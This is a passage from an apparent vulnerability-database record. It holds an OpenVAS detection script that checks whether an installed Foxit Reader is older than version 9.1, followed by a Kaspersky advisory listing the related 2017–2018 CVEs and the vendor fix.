This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813156\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2017-14458\", \"CVE-2017-17557\", \"CVE-2018-10302\", \"CVE-2018-10303\",\n \"CVE-2018-10473\", \"CVE-2018-10474\", \"CVE-2018-10475\", \"CVE-2018-10476\",\n \"CVE-2018-10477\", \"CVE-2018-10478\", \"CVE-2018-10479\", \"CVE-2018-10480\",\n \"CVE-2018-10481\", \"CVE-2018-10482\", \"CVE-2018-10483\", \"CVE-2018-10484\",\n \"CVE-2018-10485\", \"CVE-2018-10486\", \"CVE-2018-10487\", \"CVE-2018-10488\",\n \"CVE-2018-10489\", \"CVE-2018-10490\", \"CVE-2018-10491\", \"CVE-2018-10492\",\n \"CVE-2018-10493\", \"CVE-2018-10494\", \"CVE-2018-10495\", \"CVE-2018-1173\",\n \"CVE-2018-1174\", \"CVE-2018-1175\", \"CVE-2018-1176\", \"CVE-2018-1177\",\n \"CVE-2018-1178\", \"CVE-2018-1179\", \"CVE-2018-1180\", \"CVE-2018-3842\",\n \"CVE-2018-3843\", \"CVE-2018-3850\", \"CVE-2018-3853\", \"CVE-2018-5674\",\n \"CVE-2018-5675\", \"CVE-2018-5676\", \"CVE-2018-5677\", \"CVE-2018-5678\",\n \"CVE-2018-5679\", \"CVE-2018-5680\", \"CVE-2018-7407\", \"CVE-2018-9935\",\n \"CVE-2018-9936\", \"CVE-2018-9937\", \"CVE-2018-9938\", \"CVE-2018-9939\",\n \"CVE-2018-9940\", \"CVE-2018-9941\", \"CVE-2018-9942\", \"CVE-2018-9943\",\n \"CVE-2018-9944\", \"CVE-2018-9945\", \"CVE-2018-9946\", \"CVE-2018-9947\",\n \"CVE-2018-9948\", \"CVE-2018-9949\", \"CVE-2018-9950\", \"CVE-2018-9951\",\n 
\"CVE-2018-9952\", \"CVE-2018-9953\", \"CVE-2018-9954\", \"CVE-2018-9955\",\n \"CVE-2018-9956\", \"CVE-2018-9957\", \"CVE-2018-9958\", \"CVE-2018-9959\",\n \"CVE-2018-9960\", \"CVE-2018-9961\", \"CVE-2018-9962\", \"CVE-2018-9963\",\n \"CVE-2018-9964\", \"CVE-2018-9965\", \"CVE-2018-9966\", \"CVE-2018-9967\",\n \"CVE-2018-9968\", \"CVE-2018-9969\", \"CVE-2018-9970\", \"CVE-2018-9971\",\n \"CVE-2018-9972\", \"CVE-2018-9973\", \"CVE-2018-9974\", \"CVE-2018-9975\",\n \"CVE-2018-9976\", \"CVE-2018-9977\", \"CVE-2018-9978\", \"CVE-2018-9979\",\n \"CVE-2018-9980\", \"CVE-2018-9981\", \"CVE-2018-9982\", \"CVE-2018-9983\",\n \"CVE-2018-9984\", \"CVE-2018-3924\", \"CVE-2018-3939\", \"CVE-2018-17623\");\n script_bugtraq_id(105602);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 14:35:06 +0530 (Wed, 25 Apr 2018)\");\n script_name(\"Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit Reader\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error where the application passes an insufficiently qualified path in\n loading an external library when a user launches the application.\n\n - A heap buffer overflow error.\n\n - Multiple use-after-free errors.\n\n - The use of uninitialized new 'Uint32Array' object or member variables in\n 'PrintParams' or 'm_pCurContex' objects.\n\n - An incorrect memory allocation, memory commit, memory access, or array access.\n\n - Type Confusion errors.\n\n - An error in 'GoToE' & 'GoToR' Actions.\n\n - An out-of-bounds read error in the 
'_JP2_Codestream_Read_SOT' function.\n\n - An error since the application did not handle a COM object properly.\n\n - An error allowing users to embed executable files.\n\n - U3D out-of-bounds read, write and access errors.\n\n - U3D uninitialized pointer error.\n\n - U3D heap buffer overflow or stack-based buffer overflow error.\n\n - An error when the application is not running in safe-reading-mode and can\n be abused via '_JP2_Codestream_Read_SOT' function.\n\n - U3D Type Confusion errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service condition, execute arbitrary code and\n gain access to sensitive data from memory.\");\n\n script_tag(name:\"affected\", value:\"Foxit Reader versions 9.0.1.1049 and prior on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit Reader version 9.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n script_xref(name:\"URL\", value:\"https://www.securitytracker.com/id/1040733\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_reader_detect_portable_win.nasl\");\n script_mandatory_keys(\"foxit/reader/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\n## 9.1 == 9.1.0.5096\nif(version_is_less(version:pdfVer, test_version:\"9.1.0.5096\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.1\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);", "cvss": 
{"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T12:00:33", "bulletinFamily": "info", "cvelist": ["CVE-2018-10303", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "description": "### *Detect date*:\n04/19/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Foxit Reader and Foxit PhantomPDF. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service and execute arbitrary code.\n\n### *Affected products*:\nFoxit Reader earlier than 9.1.0.5096 \nFoxit PhantomPDF earlier than 9.1.0.5096\n\n### *Solution*:\nUpdate to the latest version \n[Download Foxit Reader](<https://www.foxitsoftware.com/downloads/#Foxit-Reader>) \n[Download Foxit PhantomPDF](<https://www.foxitsoftware.com/downloads/#Foxit-PhantomPDF-Business>)\n\n### *Original advisories*:\n[Security bulletins](<https://www.foxitsoftware.com/support/security-bulletins.php>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Foxit Reader](<https://threats.kaspersky.com/en/product/Foxit-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2018-3850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3850>)6.8High \n[CVE-2018-3842](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3842>)6.8High \n[CVE-2018-3843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3843>)6.8High \n[CVE-2018-10302](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10302>)6.8High \n[CVE-2018-10303](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10303>)6.8High \n[CVE-2018-3853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3853>)7.8Critical \n[CVE-2017-17557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17557>)6.8High \n[CVE-2017-14458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14458>)6.8High", "edition": 40, "modified": "2020-05-22T00:00:00", "published": 
"2018-04-19T00:00:00", "id": "KLA11237", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11237", "title": "KLA11237 Multiple vulnerabilities in Foxit Reader and Foxit PhantomPDF", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}